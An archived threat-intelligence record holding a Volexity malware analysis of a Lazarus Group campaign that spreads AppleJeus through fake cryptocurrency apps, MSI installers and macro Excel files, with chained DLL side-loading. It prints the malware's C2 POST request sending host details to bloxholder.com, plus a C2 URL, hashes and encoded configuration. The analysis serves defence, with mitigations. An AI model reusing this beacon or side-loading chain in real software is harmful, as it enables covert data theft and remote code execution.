{
	"id": "6a3434ad-cf18-439b-945d-86947e13bc30",
	"created_at": "2026-04-06T00:19:56.73826Z",
	"updated_at": "2026-04-10T13:12:44.674541Z",
	"deleted_at": null,
	"sha1_hash": "7d4807f9b35efed20d8770c0ac67a921d141b29e",
	"title": "₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2923079,
	"plain_text": "₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware\r\nBy mindgrub\r\nPublished: 2022-12-01 · Archived: 2026-04-05 13:18:07 UTC\r\nOver the last few months, Volexity has observed new activity tied to a North Korean threat actor it tracks that is widely referred to as the Lazarus Group. This activity notably involves a campaign likely targeting cryptocurrency users and organizations with a variant of the AppleJeus malware by way of malicious Microsoft Office documents. Volexity’s analysis of this campaign uncovered a live cryptocurrency-themed website with contents stolen from another legitimate website. Further technical analysis of the deployed AppleJeus malware uncovered a new variation of DLL side-loading that Volexity has not previously seen documented in the wild.\r\nThis blog outlines new techniques used by the Lazarus Group, analyzes recent AppleJeus malware variants, shares indicators from other versions of this malware, and outlines links between this activity and historic campaigns. The end of the post includes detection and mitigation opportunities for individuals or organizations likely to be targeted by this activity. As with all Volexity blogs, related indicators can be found here on GitHub.\r\nFake Website\r\nIn June 2022, the Lazarus Group registered the domain name bloxholder[.]com, and then configured it to host a website related to automated cryptocurrency trading. Further investigation revealed that this website was largely a clone of the legitimate website, HaasOnline (haasonline[.]com). All “HaasOnline” references were changed to\r\nhttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/\r\nPage 1 of 13\n\n“BloxHolder” and a handful of other updates were made throughout. A comparison of the two websites can be seen below (Figure 1).\r\nFigure 1. The legitimate website (left) and the clone (right)\r\nVolexity discovered the fraudulent BloxHolder website after identifying a new AppleJeus malware sample that was bundled as part of a Microsoft Installation (MSI) file. This discovered file, the “BloxHolder application”, is actually another case of AppleJeus being installed alongside the open-source cryptocurrency trading application QTBitcoinTrader that is available on GitHub. This same legitimate application has previously been used by the Lazarus Group, as documented in this report from CISA. The MSI file is used to install both the malicious and legitimate applications at the same time. File details are provided below:\r\nFilename BloxHolder_v1.2.5.msi\r\nSize 13305856 bytes\r\nMD5 245bb604621cea7962668325995bca7c\r\nSHA1 cc5544eff3e5b9cf20d8cf2291147596d4346dbe\r\nSHA256 eee4e3612af96b694e28e3794c4ee4af2579768e8ec6b21daf71acfc6e22d52b\r\nThe MSI file installs the legitimate application while also creating a scheduled task and additional malicious files in the folder “%APPDATA%\\Roaming\\Bloxholder\\”. The files created in this directory are shown in the screenshot below (Figure 2).\r\nFigure 2. Screenshot showing files dropped by the MSI\r\nThe task is executed at logon for any user. Its purpose is to execute another legitimate executable (“CameraSettingsUIHost.exe”) with two arguments (“18e190413af045db88dfbd29609eb877” and “lion”). “CameraSettingsUIHost.exe” is a Microsoft file that assists with usage of a webcam on the system. The created scheduled task can be seen in Figure 3.\r\nFigure 3. Malicious scheduled task created by the malware\r\nIt is in “CameraSettingsUIHost.exe” that the novel DLL side-loading occurs.\r\nNovel DLL Side-Loading Technique\r\nConventional DLL Side-Loading\r\nAs a quick primer, when an executable attempts to load a library (DLL) in Windows, it will look for this library in a set order of locations. This process is documented by Microsoft here. Therefore, by placing a malicious DLL in the same folder as the calling application, an attacker can ensure it is loaded before a legitimate DLL of the same name in the system directory. This is conventional DLL side-loading (Figure 4).\r\nFigure 4. Conventional DLL side-loading\r\nChained DLL Side-Loading\r\nThe novel technique used in this case adds a step to this process. The legitimate application loads a legitimate DLL from the “System32” directory, and then that DLL causes the loading of a malicious DLL from the application’s directory. Specifically, “CameraSettingsUIHost.exe” loads the “dui70.dll” file from the “System32” directory, which then causes the loading of the malicious “DUser.dll” file from the application’s directory into the “CameraSettingsUIHost.exe” process. The “dui70.dll” file is the “Windows DirectUI Engine” and is normally installed as part of the operating system. This novel DLL side-loading process is illustrated in Figure 5 below.\r\nFigure 5. Chained DLL side-loading\r\nIt is not clear why the threat actor added this additional step. It could cause some confusion and slow down malware analysis, but ultimately the location of the files is still the same as with the conventional method.\r\nIn a non-subtle manner, Volexity noted the internal name of DUser.dll to be HijackingLib.dll. Its purpose is to decode and load a PE file passed as the first argument on the command line, using a key passed as the second argument.\r\nAppleJeus Malware\r\nAs shown in the scheduled task in Figure 3, the name of the encoded PE file was “18e190413af045db88dfbd29609eb877”, and the second argument on the command line, “lion”, is the XOR key used to decode the file. The XOR key is 8 bytes in length. If the supplied key is smaller, it is padded with null bytes.\r\nThe decoded PE file is a downloader. Volexity identified two variants. The first variant is not obfuscated.\r\nFilename e190413af045db88dfbd29609eb877\r\nSize 165376 bytes\r\nMD5 18644822140eda7493bd75ba1e1f235d\r\nSHA1 b801643e2d817931e6aa36e6bf24d1c42e9b8fdc\r\nSHA256 fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e\r\nIts purpose is to collect information on the infected system and download shellcode from the command-and-control (C2) server. The following data is collected:\r\nMAC address\r\nComputer name\r\nOS version\r\nThis system data is likely collected to identify if the infected system is a virtual machine or sandbox, or if it is a genuine victim. These details are sent to the C2 and the malware expects the response to contain shellcode to execute. Volexity did not receive any additional payload at the time of analysis.\r\nAn example of the POST request used to send this data is given below:\r\nPOST /daemon/update.php HTTP/1.1\r\ncontent-type: application/x-www-form-urlencoded\r\nauth_timestamp: \u003cepoch time\u003e\r\nauth_signature: \u003chex value\u003e\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\r\nHost: bloxholder.com\r\nContent-Length: 75\r\nCache-Control: no-cache\r\nrlz=MDI6MDA6NEM6NEY6NEY6NTAA\u0026ei=Windows 10(19044)-LAPTOP-B39AD4N\u0026act=check\r\nFigure 6 shows the pseudocode that builds this request structure.\r\nFigure 6. POST request built by the malware\r\nThis malware is a variant of the AppleJeus malware. The network communication is similar to that described in previous reporting by Kaspersky and CISA. Volexity identified several other MSI files with cryptocurrency themes that are linked to this campaign. While these are not referenced in detail here, they are included among the IOCs. Analysis of those additional MSIs resulted in the identification of a second AppleJeus variant, which is heavily obfuscated and has a different network protocol.\r\nName(s) E57D8443104825AB22743C78B8F3AA\r\nSize 116224 bytes\r\nMD5 76111d9780b2d0b5adee61cf752d937e\r\nSHA1 5b03294b72c0caa5fb20e7817002c600645eb475\r\nSHA256 9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78\r\nAll strings and API calls are obfuscated using a custom algorithm. The network request follows this pattern:\r\nGET hxxps://strainservice[.]com/resources?a=1666860077\u0026v=1666527365\r\nThe network requests made by these newer samples match those of historical AppleJeus malware samples.\r\nMalicious Microsoft Office Documents\r\nIn October 2022, Volexity discovered a minor departure from the Lazarus Group’s typical method of installing AppleJeus via an MSI installer. This new method uses a malicious Microsoft Office document. Details of this document are below:\r\nFilename OKX Binance \u0026 Huobi VIP fee comparision.xls\r\nSize 219136 bytes\r\nMD5 51871504c1d5c09ade5e2a1e6e98c37a\r\nSHA1 ae34fa6c6baf77390fb3ff683d880cde14bf893d\r\nSHA256 17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b\r\nThe document uses embedded macros to deploy malware on the target system. Figure 7 shows the decoy content displayed to the user.\r\nFigure 7. Contents of malicious Microsoft Excel file showing cryptocurrency coin rates\r\nThe document contains a macro split into two parts. The purpose of the first part is to decode a base64 blob that contains a second OLE object containing a second macro. The initial document also stores several variables, encoded using base64, in a form object (Figure 8).\r\nFigure 8. Configuration data for the macro stored in a form object\r\nThe variables shown in Figure 8 are used by the second macro to define where the malware will be deployed on the infected system. The decoded values are shown below:\r\nBase64 Value | Decoded Value\r\nQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBvAA== | C:\\ProgramData\\So\r\nNQA2ADcANgAyAGUAYgA5AC0ANAAxADEAYwAtADQAOAA0ADIALQA5ADUAMwAwAC0AOQA5ADIAMgBjADQANgBiAGEAMgBkAGEA | 56762eb9-411c-4842-9530-9922c46ba2da\r\nZgB0AHcAYQByAGUAQwBhAGMAaABlAFwA | ftwareCache\\\r\nLwBzAGgAYQBkAG8AdwA= | /shadow\r\nbABvAGcAYQBnAGUAbgB0AC4AZQB4AGUA | logagent.exe\r\ndwBzAG8AYwBrADMAMgAuAGQAbABsAA== | wsock32.dll\r\nThe ultimate purpose is to download a remotely hosted payload from the public file-sharing service OpenDrive. Figure 9 shows the URL from which the payload is downloaded.\r\nFigure 9. Next stage payload stored on OpenDrive\r\nWhile the file was no longer available at the time of analysis, based on public sandbox results for the file in question, the downloaded payload, “Background.png”, embeds the following three files:\r\n“Logagent.exe” – a legitimate file (md5: eb1e19613a6a260ddd0ae9224178355b)\r\n“wsock32.dll” – a side-loaded library internally named HijackingLib.dll (md5: e66bc1e91f1a214d098cf44ddb1ae91a)\r\n“56762eb9-411c-4842-9530-9922c46ba2da” – an encoded payload decoded by “wsock32.dll”\r\nThe three files are dropped on disk using hardcoded offsets that can be found in the second macro. The file paths are computed from the base64 variables mentioned previously. Figure 10 shows the writing of the files.\r\nFigure 10. Different offsets used to extract the malicious files\r\nDespite not having access to the final payload, Volexity assesses this is related to the same Lazarus Group campaign based on the following factors:\r\nThe filename pattern used for the payload (using a UUID style format)\r\nThe command-line arguments (\u003cexecutable\u003e \u003cfilename\u003e \u003cxor key\u003e)\r\nThe behavior of the side-loaded library\r\nSignificant similarities in the code between “DUser.dll” and “wsock32.dll”\r\nThe same internal name (“HijackingLib.dll”)\r\nComparison with Older AppleJeus Campaigns\r\nThe following table describes similarities Volexity has identified between the campaign described in this blog and the overview of historical campaigns described by CISA.\r\nUsed In Current Campaign | Similar to Historical Campaigns\r\nMSI package | AppleJeus Version 1, 2, 3, 4, 5, 6\r\nFiles located in %APPDATA%\\Roaming\\%APPNAME%\\ | AppleJeus Version 2, 3, 4, 5, 6\r\nNamecheap used to host C2 | AppleJeus Version 5, 6, 7\r\nUse of fake QT Bitcoin Trader app | AppleJeus Version 1, 2\r\nThe PE metadata structure of the files used in the current campaign and historical campaigns follows similar formats, shown in Figures 11 and 12 below.\r\nFigure 11. PE metadata structure of current campaign\r\nFigure 12. PE metadata structure of historical campaigns\r\nIn addition to the information from the CISA report, the network protocol from the first analyzed sample is the same as the one described by Kaspersky in this report. The screenshot in Figure 13 (Kaspersky publication) shows the same protocol as that shown in Figure 6 (the first sample from this blog).\r\nFigure 13. POST request from Kaspersky report\r\nNew elements of this current campaign include the following:\r\nUsage of malicious Microsoft Office documents in addition to the backdoored applications\r\nPerforming DLL side-loading in two steps, rather than a single step\r\nNew AppleJeus variants with strings and API obfuscation, and a new network protocol\r\nConclusion \u0026 Mitigations\r\nIn February 2021, CISA published an advisory concerning the AppleJeus malware. The advisory describes the variants observed from 2018 to 2021. Volexity has identified a similar campaign taking place between June and October 2022 using new variants of AppleJeus. The campaign from June 2022 follows the same broad pattern as the one described by CISA: a cryptocurrency application packaged in a malicious MSI file.\r\nThe dropped payloads in the recent campaign abuse DLL side-loading techniques to execute the next stage. But the DLL side-loading implementation was not always standard. In some cases, it was performed by proxy, where the EXE calls a DLL that subsequently calls the attacker’s DLL. It is interesting to note that the malicious side-loaded library has strong obfuscation of all strings and API calls, making static analysis more complex.\r\nAlso newly observed was the shift, discovered in October 2022, from the use of MSI files to malicious Microsoft Office documents. The Microsoft Office documents use an OLE object with a macro dynamically loaded from another macro. This technique seems to reduce static detection by security products, and it deviates from what is now a publicly well-documented campaign.\r\nThe Lazarus Group continues its effort to target cryptocurrency users, despite ongoing attention to their campaigns and tactics. Perhaps in an attempt to elude detection, they have decided to use chained DLL side-loading to load their payload. Additionally, Volexity has not previously noted the use of Microsoft Office documents to deploy AppleJeus variants. Despite these changes, their targets remain the same, with the cryptocurrency industry being a focus as a means for the DPRK to bolster their finances.\r\nTo generically detect and investigate attacks like the one described in this blog, Volexity recommends the following:\r\nWhere possible, block macro execution in Microsoft Office as described in this Microsoft post.\r\nMonitor creation of new scheduled tasks to identify anomalies.\r\nTo prevent these specific attacks, Volexity recommends the following:\r\nUse the YARA rules here to detect related activity.\r\nBlock the IOCs provided here.\r\nVolexity’s Threat Intelligence research, such as the content from this blog, is published to customers via its Threat Intelligence Service and was covered by TIB-20221103. Volexity Network Security Monitoring customers are also covered automatically through signatures and deployed detections from the threats and IOCs described in this post.\r\nVolexity’s leading memory analysis product, Volexity Volcano, detects the DLL side-loading technique discussed in this post through its “Search Order Hijacking” analytic.\r\nIf you are interested in learning more about these products and services, please do not hesitate to contact us.\r\nAppendix\r\nRelated IOCs include the following:\r\nSource: https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
	],
	"report_names": [
		"buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "544ecd2c-82c9-417c-9d98-d1ae395df964",
			"created_at": "2025-10-29T02:00:52.035025Z",
			"updated_at": "2026-04-10T02:00:05.408558Z",
			"deleted_at": null,
			"main_name": "AppleJeus",
			"aliases": [
				"AppleJeus",
				"Gleaming Pisces",
				"Citrine Sleet",
				"UNC1720",
				"UNC4736"
			],
			"source_name": "MITRE:AppleJeus",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434796,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7d4807f9b35efed20d8770c0ac67a921d141b29e.pdf",
		"text": "https://archive.orkl.eu/7d4807f9b35efed20d8770c0ac67a921d141b29e.txt",
		"img": "https://archive.orkl.eu/7d4807f9b35efed20d8770c0ac67a921d141b29e.jpg"
	}
}